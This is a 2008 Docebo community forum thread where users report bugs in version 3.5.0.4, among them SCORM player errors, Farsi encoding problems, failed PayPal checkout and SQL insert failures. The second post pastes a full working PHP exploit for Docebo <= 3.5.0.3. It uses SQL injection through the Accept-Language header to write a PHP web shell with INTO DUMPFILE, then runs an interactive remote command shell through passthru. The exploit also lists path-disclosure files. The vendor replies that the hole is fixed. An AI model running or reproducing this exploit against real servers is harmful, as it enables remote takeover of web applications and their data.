docebo.com community - Docebo 3.5.0.4 Bugs

<< Back

Message for this thread
Posted by	Messages text
Erba Claudio Total post : 2688 Profile	Written on : 22/03/2008 10:56 ( more than one month ) Object : Docebo 3.5.0.4 Bugs Please report here bugs ONLY related to docebo 3.5.0.4 Message modified by : claudio.erba on : 22/04/2010 13:03 Docebo CEO and Founder www.docebo.com

unixborges Total post : 1 Profile	Written on : 22/03/2008 21:57 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Eu ainda não testeira, mas seria bom verificar isso aqui. <? /* ------------------------------------------------------------------- Docebo <= 3.5.0.3 (lib.regset.php) Remote Command Execution Exploit ------------------------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://www.docebo.com/community/ details..: works with magic_quotes_gpc = off (if magic quotes affects also $_SERVER[] array) [-] autoDetectRegion() function vulnerable to SQL injection in /doceboCore/lib/lib.regset.php 781. function autoDetectRegion() { 782. 783. if(!isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])) { 784. $res=0; 785. return $res; 786. } 787. $accept_language=$_SERVER["HTTP_ACCEPT_LANGUAGE"]; 788. // [TODO] move the code that makes the accept language array to lib.utils 789. 790. $al_arr=explode(",", $accept_language); 791. 792. $i=0; 793. $res=""; 794. while(($res == "") && ($i < count($al_arr))) { 795. 796. $bl_arr=explode(";", $al_arr[$i]); 797. $browser_language=$bl_arr[0]; 798. 799. $qtxt="SELECT region_id FROM ".$this->_getListTable()." WHERE browsercode LIKE '%".$browser_language."%'"; <== 800. $q=$this->_executeQuery($qtxt); 801. 802. if (($q) && (mysql_num_rows($q) > 0)) { 803. $row=mysql_fetch_array($q); 804. $res=$row["region_id"]; 805. } an attacker cuold be inject SQL code through http accept-language header (in the query at line 799), but explode() function at line 790 will split the injected code by comma (","), so isn't possible even a blind SQL injection with BENCHMARK() method... this poc will try to inject some php code into docebo web directory by INTO DUMPFILE statement, this requires FILE privilege! [-] Path disclosure at: /doceboCore/class/class.conf_fw.php /doceboCore/class.module/class.event_manager.php /doceboCore/lib/lib.domxml5.php /doceboCore/menu/menu_over.php /doceboCms/class/class.conf_cms.php /doceboCms/lib/lib.compose.php /doceboCms/modules/chat/teleskill.php /doceboCms/class/class.admin_menu_cms.php / error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again...\n"; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1); fclose($sock); return $resp; } function get_path() { global $host, $path; $packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Connection: close\r\n\r\n"; preg_match("/in <b>(.)<\/b> on/i", http_send($host, $packet), $found); $ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo"))); $ret.= substr($path, 1); return $ret; } print "\n+------------------------------------------------------------+"; print "\n\| Docebo <= 3.5.0.3 Remote Command Execution Exploit by EgiX \|"; print "\n+------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage....: php $argv[0] host path\n"; print "\nhost.....: target server (ip/hostname)"; print "\npath.....: path to docebo directory\n"; print "\nExample..: php $argv[0] localhost /doceboCms/"; print "\nExample..: php $argv[0] localhost /docebo/doceboLms/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $r_path = str_replace("\\", "/", get_path()); // replace "\" for windows path $r_file = md5(time()).".php"; print "\n[-] Path disclosure: {$r_path}\n\n[-] Trying to inject php shell...\n"; $code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>"; $packet = "GET {$path} HTTP/1.0\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Accept-Language: %'//AND//1=0//UNION//SELECT//'{$code}'//INTO//DUMPFILE//'{$r_path}{$r_file}'/*\r\n"; $packet.= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); $packet = "GET {$path}{$r_file} HTTP/1.0\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); if (!ereg("_code_", $html)) die("\n[-] Exploit failed...\n"); else print "[-] Shell injected! Starting it...\n"; define(STDIN, fopen("php://stdin", "r")); while(1) { print "\nxpl0it-sh3ll > "; $cmd = trim(fgets(STDIN)); if ($cmd != "exit") { $packet = "GET {$path}{$r_file} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: ".base64_encode($cmd)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $html = http_send($host, $packet); if (!ereg("_code_", $html)) die("\n[-] Exploit failed...\n"); $shell = explode("_code_", $html); print "\n".$shell[1]; } else break; } ?> # milw0rm.com [2008-01-09]

Erba Claudio Total post : 2688 Profile	Written on : 23/03/2008 22:45 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs This is not a 3.5.0.4 bug, this is Fixed in this release Claudio Docebo CEO and Founder www.docebo.com

Omid Total post : 343 Profile	Written on : 26/03/2008 21:25 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Hi I have found three issues regard to language : 1- CSV that could be grabbed from report module in admin area has problem with Farsi language (and maybe any other utf-8 supported language) and doesn`t show characters correctly . 2- PDF certificate created via Docebo has problem via Farsi language . 3-Tiny chat module related to those users that are online in one course could transfer only latin (English) characters and it has problem with Farsi language or maybe any other utf-8 supported language .

Svenningsen Kevin Total post : 17 Profile	Written on : 28/03/2008 13:22 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Hi, I still experience problems with the Scorm-player although upgrading to version 3.5.0.4 The problem also existed earlier ( please see thread "3.5.03 SCORM Player Error" at http://www.docebo.com/community/doceboCms/forum/9_1/message/idThread_3651/3_5_03_SCORM_Player_Error.html ) When I have created a module in CourseLab and imported it in Docebo, whenever I start the module or go to the next step in the module, a javascript alert box appears with the message "Fatal error", and afterwards a new windows open with the following error message: "Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 375" I have tried to open the module using the newest Firefox, but a javascript alert box also appears here with the message "TypeError: w has no properties", and again a new window opens with the following error message: "Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 419" Has this something to do with the use of CourseLab? (I hope not, since all the modules are ready for use and have been made in CourseLab). Or is there still a bug in the Scorm-player in Docebo? (I can upload one of the CourseLab modules, if you want to see it...) Hope somebody can help with some answers since I'm running close to a deadline. Sincerely, Kevin

Omid Total post : 343 Profile	Written on : 30/03/2008 00:36 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs 1. After message submit action , IE doesn`t load any content related to below address : http://www.mysite.com/doceboLMS/index.php?modname=message&op=writemessage 2. There is no link tag in _LOST_PWD_MAILTEXT translation key ! Please provide it here , I really need it .

Svenningsen Kevin Total post : 17 Profile	Written on : 02/04/2008 21:31 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Hi again, Just some more details about the error, I experience: The first time a module is opened, a javascript error message box opens with the message “[object Error]” and nothing else. At the same time a new window opens with an error in line 419: “Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 419” Afterwards when I go through the e-learning module a window opens with this message: “Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 400” And each time a click through a page in the module the javascript error message box with the message “[object Error]” show up. As far as I can tell, the lines 400 and 419 are the same (in soaplms.php), which means it is the same error. And if the javascript error messages are related to these two lines, it should just be one error, that needs to be corrected?! Although I do not know which error that is…. Sincerely, Kevin Writted by: Svenningsen Kevin Hi, I still experience problems with the Scorm-player although upgrading to version 3.5.0.4 The problem also existed earlier ( please see thread "3.5.03 SCORM Player Error" at http://www.docebo.com/community/doceboCms/forum/9_1/message/idThread_3651/3_5_03_SCORM_Player_Error.html ) When I have created a module in CourseLab and imported it in Docebo, whenever I start the module or go to the next step in the module, a javascript alert box appears with the message "Fatal error", and afterwards a new windows open with the following error message: "Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 375" I have tried to open the module using the newest Firefox, but a javascript alert box also appears here with the message "TypeError: w has no properties", and again a new window opens with the following error message: "Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 419" Has this something to do with the use of CourseLab? (I hope not, since all the modules are ready for use and have been made in CourseLab). Or is there still a bug in the Scorm-player in Docebo? (I can upload one of the CourseLab modules, if you want to see it...) Hope somebody can help with some answers since I'm running close to a deadline. Sincerely, Kevin

Omid Total post : 343 Profile	Written on : 03/04/2008 18:10 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Hi I couldn`t delete any user from Admin Area , after confirm I`ll receive this error : Fatal error: Call to a member function after_unserialize() on a non-object in /home/user/public_html/docebo/doceboCore/lib/lib.usernotifier.php on line 50 ----------------------------------------------------------------------------------------------------------------------- I found that I have this problem only with my native language , I had this problem in previous versions too . Is there any solution for it ? Message modified by : omid020 on : 03/04/2008 18:17

Jellab Hicham Total post : 1 Profile	Written on : 28/05/2008 16:37 ( more than one month ) Object : Paypal Not Working Hello, I tried to test the Ecommerce module with Paypal but I can't complete the checkout with the Paypal interface for final payment. I have configured the Ecommerce in the Admin area, checked that the right Paypal account address (email) was inserted in Mysql ...etc. I logged in as a user, added a course to my shopping cart, gone until the last screen (Confirm buy) but then the system won't redirect me to Paypal website. Any hint or help on this ? Thank you

Koster Matthew Total post : 5 Profile	Written on : 06/08/2008 15:27 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Many bugs on my end: 1. First name and Last name are mixed in the display... In the First name I have Matthew, Last name I have Koster, yet everywhere it displays Koster Matthew, and not the right way of Matthew Koster 2. My Area, when scrolling down (in FireFox, have not tested in I.E.) you cannot get to the menu, it disappears before you get to it. 3. When viewing my courses, clicking on Course Material, gets you nothing, but when browsing the list... here is why http://www.firewebuniversity.com/doceboLms/index.php?modname=coursecatalogue&op=donwloadmaterials&id_course=1 <-- Correct Link http://www.firewebuniversity.com/doceboLms/index.php?modname=course&op=donwloadmaterials&id_course=1 <--- Bad link 4. Quizes, I canot se the questions in a quiz, it simply asks me to submit. As far as I can tell, that all the problems I can find so far. Message modified by : lostnode on : 06/08/2008 16:28

Omid Total post : 343 Profile	Written on : 06/08/2008 20:02 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Writted by: Koster Matthew Many bugs on my end: 1. First name and Last name are mixed in the display... In the First name I have Matthew, Last name I have Koster, yet everywhere it displays Koster Matthew, and not the right way of Matthew Koster 2. My Area, when scrolling down (in FireFox, have not tested in I.E.) you cannot get to the menu, it disappears before you get to it. 3. When viewing my courses, clicking on Course Material, gets you nothing, but when browsing the list... here is why http://www.firewebuniversity.com/doceboLms/index.php?modname=coursecatalogue&op=donwloadmaterials&id_course=1 <-- Correct Link http://www.firewebuniversity.com/doceboLms/index.php?modname=course&op=donwloadmaterials&id_course=1 <--- Bad link 4. Quizes, I canot se the questions in a quiz, it simply asks me to submit. As far as I can tell, that all the problems I can find so far. The first one is an standard in Docebo LMS and that isn`t bug . I test it in firefox but there is no problem ! Third item is not clear to me :( For fourth item , as I know "test module" has no problem , could you please place an screenshot in related forum category and describe it more ? Regards

Koster Matthew Total post : 5 Profile	Written on : 07/08/2008 20:54 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs I will do one better, I will post a video (linked for one of my sites) as screen captures just won;t do for the roll over problem... here is another bug.. I set it up again and someone mistyped my password, so I went to get ti sent to me, and no links appear, just the following, word for word with no links... "This is the process to generate a new password for user associated to this email. Click on the link below to generate a new password.rnrnWARNING: The new password will be sent to you by email after clicking on this link.rnThen you can use new password to login."

Koster Matthew Total post : 5 Profile	Written on : 07/08/2008 22:04 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs http://www.matthewkoster.com/problem/ <-- There is the video of the problem I have. Also, is there a way to embed video... I tried via making a web page but it doesn't work.

Koster Matthew Total post : 5 Profile	Written on : 08/08/2008 01:15 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs More issues. What do you mean by Advance, if you are selling the course? Its a field under the cost... What ever it is I get results when I have a value in it, but Paypal still doesn;t work, watch this video as well http://www.matthewkoster.com/problem/prob2.html It explains a few of the problems in more detail.

Tiberiu Vaduvoiu Total post : 20 Profile	Written on : 16/09/2008 10:41 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs 1 bug noticed in the creation of the course. I created a course X of type classroom. In the "special option" I set Minimum number of subscription = 1 and Maximum number of subscription = 10. I logged in as a user/student, I go to Course Catalog and I wanted to subscribe to course X. I see subscribtion blocked button and when I click on the button I get message "imp course full" message. So the max nr is 10, there is no person subscribed and students cannot subscribe to the course because it says "course full". If i change Maximum number of subscription = 0(unlimited), then subscribtion works. But if I put any number, it doesn't work anymore. Also, if I put minim = 0, maxim = 2, students can subscribe but then the maximum doesn't work. meaning more then 2 students were able to subscribe.

Tiberiu Vaduvoiu Total post : 20 Profile	Written on : 26/09/2008 10:09 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs If a course has the Course Completion option checked to "Automatic after completing the end course LO", the student should see "you have finished the course" after he completes all learning object. Only this doesn't happen. I completed a course that had that option checked, course progress was all filled, 100% but on my Courses area, I could still see "you are attending this course" instead of "you have finished this course".

Santinelli Valerio Total post : 4 Profile	Written on : 01/10/2008 16:59 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Fresh installation. When creating a new category: Error on _addFolder: INSERT into learning_category( idCategory, idParent, path, lev) VALUES (NULL,'0','/root/Prova','1') Field 'description' doesn't have a default value

Santinelli Valerio Total post : 4 Profile	Written on : 01/10/2008 17:38 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs When creating a new user from the user administration interface I get the following error: INSERT INTO core_setting_user ( path_name, id_user, value ) VALUES ( 'ui.template', '', 'standard' ) with error: Out of range value adjusted for column 'id_user' at row 1 and no user is created in the core_user table as well

Santinelli Valerio Total post : 4 Profile	Written on : 01/10/2008 17:38 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs When logging off I gt the following warning: Warning: Missing argument 12 for Form::getLinePassword(), called in C:\lavori\cvs\docebo\doceboCore\lib\lib.usermanager.php on line 1058 and defined in C:\lavori\cvs\docebo\doceboCore\lib\lib.form.php on line 382 Notice: Undefined variable: value in C:\lavori\cvs\docebo\doceboCore\lib\lib.form.php on line 386

Erba Claudio Total post : 2688 Profile	Written on : 01/10/2008 21:03 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Did you configure your server alone? Seems a really bad configured server, also with notice enabled and/or file missing Claudio Message modified by : claudio.erba on : 01/10/2008 21:04 Docebo CEO and Founder www.docebo.com

Santinelli Valerio Total post : 4 Profile	Written on : 02/10/2008 12:42 ( more than one month ) Object : Re: Docebo 3.5.0.4 Bugs Hi Claudio, warnings and notices are enabled on purpouse. The point is that either there are some problems with the way tables get created or with the user interfaces that do not show some fields that are instead considered mandatory. (For example the description field of a course category). The server is a standard Apache 2.0.59 with PHP 5.1.4 running on Windows. This is not a first time installation. I use this configuration for day to day development and Docebo is the only software giving such problems so it's either not compatible with those versions (btw MySQL is v5.0.18) or there are still some bugs. Installation of Docebo went smooth actually. There were no errors or warnings so I suppose that there isn't any file missing. I might be wrong of course, but still I doubt that a wrong query is due to a missing file :) Is there any way to have the application dump information to a log file or write some more debug info on the pages in order to actually understand what's going wrong without having to debug the code?

<< Back

Main

Community

Channels